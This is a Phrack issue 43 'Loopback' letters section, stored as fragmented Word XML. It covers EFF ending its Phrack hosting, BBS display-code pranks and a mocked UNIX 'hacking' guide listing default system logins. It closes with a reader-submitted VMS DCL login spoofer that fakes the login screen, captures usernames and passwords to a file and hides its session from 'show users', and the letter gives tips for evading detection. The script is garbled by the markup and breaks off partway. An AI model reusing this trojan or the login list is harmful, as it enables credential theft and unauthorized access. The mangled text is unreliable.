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A98C" w14:textId="7E7DA789" w:rsidR="002354EC" w:rsidRDefault="00717DEF" w:rsidP="00717DEF">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>===================restored from the wayback machine in 2016====================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9130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File: archives/43/p43_0x02_Phrack Loopback Part I_by_Phrack Staff.txt                              ==Phrack Magazine==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BF58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7B4F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Volume Four, Issue Forty-Three, File 2 of 27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C5DE3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ABB3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Phrack Loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C577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Part I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955269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6099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4C9B533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4C2B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COMING NEXT ISSUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663DEC5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0E97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Van Eck Info (Theory &amp; Practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829AA4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Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177938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HUGE University Dialup List  (Mail Us YOUR School's Dialup NOW!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362B0E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Neato Plans For Evil Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C295D1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Gail Thackeray Gifs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6218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081B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 M A I L *********************************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D559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99BD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Chris,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C1EA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0080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Craig Neidorf gave me these addresses as ways to reach you.  He tells me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27415AA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that you are currently editing Phrack.  I hope you are well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F65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9452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Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7E4F1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eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD1D7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IUP connection, was charging us an extra $1,000 per month.  They did some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60503E9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investigation at my request.  We determined that Phrack traffic alone was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DF0F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responsible for over 40% of the total bytes transferred from the site over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791D97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the past year or so.  This is several gigabytes per month.  All in all, the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151A5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CuD archive, which contains Phrack, CuD, and other publications accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044A8FF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for 85% of our total traffic.  All of the email to and from EFF, Usenet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B819E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traffic, and other FTP (from the EFF archive, the CAF archive, and others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3B8B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constitutes about 15%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2083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2079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EFF isn't going to be able to carry it any more because it is effectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AADF8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costing us $1,000 per month.  The fundamental problem is that Phrack is so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D776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popular (at least as a free good) to cause real expense in transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE9DFC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costs.  Ultimately the users are going to have to pay the costs because</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B258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bandwidth (when measures in gigabytes anyway) isn't free.   The 12K per</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B30C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year it costs us to carry Phrack is not something which EFF can justify in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A93C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its budget.  I'm sure you can understand this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73816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7EC9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On July 1, eff.org moves from Cambridge to Washington, DC which is when I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B273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expect we will stop carrying it.  I wanted to raise this issue now to let</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519CD0E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you know in advance of this happening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08064EC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84E7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 have also asked Chris and Helen to talk to Brendan Kehoe, who actually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB69A2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maintains the archive, to see whether there is anything we can do to help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A446DC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find another site for Phrack or make any other arrangement which will</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33900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result in less loss of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2953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92CD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Mitch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9EB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00A9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33C9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333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498FB4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Mitchell Kapor, Electronic Frontier Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB517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Note permanent new email address for all correspondence as of 6/1/93</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70BD3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mkapor@kei.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1793F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376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2373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Well, all things must come to an end.  Looks like EFF's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE663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move to Washington is leaving behind lots of bad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F354A1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memories, and looking forward to a happy life in the hotbed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69227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of American politics.  We wish them good luck.  We also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5BE03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encourage everyone to join.........CPSR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B62FB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087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 all fairness, I did ask Mitch more detail about the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416EBA7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specifics of the cost, and he explained that EFF was paying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3744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flat rate for a fractional T-1, and whenever they went over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C122A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their allotted bandwidth, they were billed above and beyond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B76D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flat rate.  Oh well.  Thank GOD for Len Rose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA56C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Phrack now has a new home at ftp.netsys.com.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451070E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9238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19645C9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1CED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having a really hard time finding a lead to the Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A83BB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America Network.  I am writing you guys as a last resort.  Could</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160689E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you point me in the right direction?  Maybe an access number or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5614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something?  Thanks you very much.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D0912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DEB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You can reach Information America voice at 404-892-1800.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43318E2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They will be more than happy to send you loads of info.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26ABC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8F40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2BD7226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FFCD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whom it may concern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4D1F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This is a submission to the next issue of phrack...thanks for the great</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18182B1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'zine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72396E2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----------------------------cut here-------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204326A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Greetings Furds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2FC5B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FE10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you ever wanted to impress one of those BBS-babes with your astounding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628BF8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knowledge of board tricks?  Well *NOW* you can!  Be the life of the party!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344987A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Gain and influence friends!  Irritate SysOps!  Attain the worship and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5CCB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admiration of your online pals.  Searchlight BBS systems (like many other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB41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software packages) have internal strings to display user information in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B6EE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messages/posts and the like.  They are as follows (tested on Searchlight BBS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249A1C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System v2.25D):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD11D2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909D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\%A  =  displays user's access level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA287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\%B  =  displays baud rate connected at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EFDA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\%C  =  unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6166A24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\%F  =  unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C3BC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\%G  =  displays graphics status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D63A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\%K  =  displays user's first name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362415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\%L  =  displays system time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2162F6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\%M  =  displays user's time left on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9112B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\%N  =  displays user's name in format: First Last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1486D4C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\%O  =  times left to call "today"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DFDC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\%P  =  unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1CD40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\%S  =  displays line/node number and BBS name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF784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\%T  =  displays user's time limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6CE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\%U  =  displays user's name in format: FIRST_LAST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E165AB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3BF8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All you gotta do is slam the string somewhere in the middle of a post or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F87B9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something and the value will be inserted for the reader to see.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9EA8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7305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Example:  Hey there chump, I mean \%K, you better you better UL or log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2701C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off of \%S...you leach too damn many files..you got \%M mins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D012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left to upload some new porn GIFs or face bodily harm and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1C2F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mutilation!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0F4A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6F86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----------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62252FD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8EE1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Have phun!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3084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Inf0rmati0n Surfer (&amp; Dr. Cloakenstein)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732070E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SysOp Cranial Manifestations vBBS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E98AFE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1042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9918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Ya know, once a LONG LONG time ago, I got on a BBS and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0D2D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while reading messages noticed that a large amount of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0764868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messages seemed to be directed at ME!!#  It took me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A94E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about 10 minutes to figure it out, but BOY WAS I MAD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F5F4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6D5D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Then I added my own \%U message for the next hapless fool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF6C25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:)  BIG FUN!]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B768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DEAF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693CA14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3476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-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D71FD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E85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SotMESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A884B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EC05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The US SotMESC Chapter is offering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4CCD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Scholarships for the 1993 school term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223907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A64A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Entries should be single-spaced paragraphs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4F7D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Double-spacing between paragraphs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C4FFE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9D9A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subject should center on an aspect of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F720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Computer Culture and be between 20-30 pages long.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206925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98F7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Send entries to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5270A87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C6CF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SotMESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE453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PO Box 573</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1E28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Long Beach, MS 39560</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC8B4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7A65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entries submitted will become the property of the SotMESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F4398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F000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-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0D1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593D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11A6BAC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7A22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Southwest Netrunner's League's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3BD4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14:paraId="51B13F3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WareZ RoDeNtZ Guide to UNIX!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2BC2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14:paraId="0A8A081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4B92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Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F20483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Assists  by:SysCon XIV       (The Ma'Bell Rapist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447E41A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Iron Man MK 4a   (Things that make ya go boom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA9E3B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1858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file begs to be folded, spindeled,and mutilated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB44C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Rights Reserved@1993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B93B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E972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14:paraId="35A91AB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3D3A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Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A6A7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3C3D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Coming this September.... Shadowland, 68020... Watch this space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D740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14:paraId="11F86D8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FD21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Part I(Basic commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C106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E1AE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Phile Commands: ls=List Philes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB1EC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more,page=Display Phile on Yo Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9AD9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cp=Copy Phile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49152AC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mv=Move or Remove Philes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1742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rm=Remove Philes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33704DA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EDBC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Editor Commnds: vi=Screen Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302317C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4BC2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Dirtory cmmnds: dir=Prints Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C33C9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mkdir=Makes a new Directory(also a VERY bad bug)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7986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rmdir=Remove a Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179ED92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pwd=print working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD5A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6F57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Misc. Commands: apropos=Locate commands by keyword lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52CFB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whatis=Display command description.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8376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man=Displays manual pages online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B72A85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cal=Prints calendar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1BCD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date=Prints the time and date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A77CC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who=Prints out every one who is logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156A6F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(Well, almost everyone 7:^]  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F483F3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DD36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14:paraId="04941F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BF34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Part II(Security(UNIX security, another OXYMORON  7:^]  ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D07E0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02A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If you are a useless wAReZ r0dEnT who wants to try to Netrun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE503E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 UNIX system, try these logins....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2920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8CE8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</w:p>
    <w:p w14:paraId="61576BC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unmountsys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF8D1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</w:p>
    <w:p w14:paraId="42654BC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makefsys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43180A3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sysadm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C0D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powerdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA588C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mountfsys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557DE28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checkfsys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596969B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A065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24EE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All I can help ya with on da passwords iz ta give you some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B92A0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simple guidelines on how they are put together....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E97B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F891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6-8 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B455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6-8 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084022D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character is a special character (exmpl:# ! ' &amp; *)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84DB0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3AEB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14:paraId="41E1FF5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D7F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Well thats all fo' now tune in next time, same Hack-time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4C1A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same Hack-channel!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631526F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5882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554F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TECHNOMANCER           I have taken all knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59CA9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af604@FreeNet.hsc.colorado.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBEFA6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to be my province</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98DD3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B6FB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2AA303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Technomancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608EC0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Southwest Netrunner's League</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5288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A429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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218D1C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57B9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This is an example of what NOT to send to Phrack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2383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This is probably the worst piece of garbage I've</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2E42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received, so I had to print it.  I can only hope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB78E0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it's a private joke that I just don't get.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D05E9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880D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Uh, please don't try to write something worse and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802CF3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submit it hoping to have it singled out as the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED3F2B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next "worst," since I'll just ignore it.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6412C40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7E6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474C534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2883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Dear Phrack,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0177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was looking through Phrack 42 and noticed the letters about password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B20411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stealers. It just so happened that the same day I had gotten extremely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EC11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busted for a program which was infinitely more indetectible. Such is life.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F1604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 got off pretty well being an innocent looking female so it's no biggie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45063E2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Anyway, I deleted the program the same day because all I could think was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A71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"Shit, I'm fucked". I rewrote a new and improved version, and decided to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A8C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submit it. The basic advantages of this decoy are that a) there is no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463085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login failure before the user enters his or her account, and b) the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E87EB1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program defines the show users command for the user so that when they</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53CBF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do show users, the fact that they are running out of another account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4BC6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doesn't register on their screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D07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a couple holes in this program that you should probably be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F110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aware of. Neither of these can kick the user back into the account that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D80A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the program is running from, so that's no problem, but the program can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C82B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still be detected. (So basically, don't run it out of your own account...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFABB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except for maybe once...to get a new account to run it out of) First, once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFAF09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the user has logged into their account (out of your program of course) hitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC55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control_y twice in a row will cause the terminal to inquire if they are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA32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doing this to terminate the session on the remote node. Oops. It's really no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B642A4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problem though, because most users wouldn't even know what this meant. The</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB74B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other problem is that, if the user for some strange reason redefines show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1C9A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31C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 == ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D650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903D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then the show users screen will no longer eliminate the fact that the account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A57B1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is set host out of another. That's not a big deal either, however, because</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F0FD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not many people would sit around randomly deciding to redefine show.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFB50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reason I was caught was that I (not even knowing the word "hacker"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21918D9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until about a month ago) was dumb enough to let all my friends know about the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F09EF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program and how it worked. The word got spread to redefine show, and that's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151002F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what happened. The decoy was caught and traced to me. Enough BS...here's the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D7F6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program. Sorry...no UNIX...just VMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DD1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Lady Shade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1C35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EDB5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 wrote the code...but I got so many ideas from my buddies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D903A3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Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01164B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E0A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA8833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E011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p1 .eqs. "SHOW" then goto show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B8BD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$sfile = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571A14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63462F7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The role of the dummy file in this program is to tell if the program !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698957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is being used as a decoy or as a substitute login for the victim. It !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9F16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does not stay in your directory after program termination.           !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E149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7B87E21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$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA012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sfile .nes. "" then goto other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600AD27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$open/write io user.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38F9E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D797C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$open/write dummy instaar_device:[miller_g]dummy.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6F2C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dummy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FD9B2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== "write sys$output"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937257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$line = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4A2A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$user = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E003CB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$pass = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25980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$a$ = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F46788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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A6BB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A login screen with a message informing someone of new mail wouldnt !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22525C4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be too cool...                                                      !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB477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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E09B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broadcast=nomail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE762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message/noidenficitaion/noseverity/nofacility/notext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C899A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$on error then goto outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA83F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$!on control_y then goto inner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D647A5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 [H [2J"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B6769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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF087A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1291C56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insert a fake logout screen here !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EB3D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5549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   ZJABAD_X     logged out at ", f$time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160472D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 [2A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B736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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BBE22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This is the main body of the program. It simulates the system login !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E0B94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screen. It also grabs the username and password and sticks them in  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831C0D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a file called user.dat                                              !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF30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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7F9C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$outer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632703F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term/noecho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACEFF8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$inquire a$/nopun ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EBD9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$inquire a$/nopun ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CC70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term/echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC9B6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 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042B76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$c1 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A83B7D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$c2 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30E53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$inner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6195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$c2 = c2 + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209603F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c2 .eqs. 5 then goto speedup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622851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 = c + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558172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c .eqs. 15 then goto fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7CE03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c1 .eqs. 3 then goto fail3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1E4B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$user = "a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0E2D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"Username: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222AB37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$from_speedup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33848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term/uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627097B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 [2A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478614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$read/time_out=10/prompt=" [9C " sys$command user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938C3E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user .eqs. "a" then goto timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C11A7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term/nouppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2821FA8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user .eqs. "" then goto inner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9449E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term/noecho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E42CB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$inquire pass "Password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D941D6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term/echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637F53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user .eqs. "ME" then goto done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC73D3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pass .eqs. "" then goto fail</w:t>
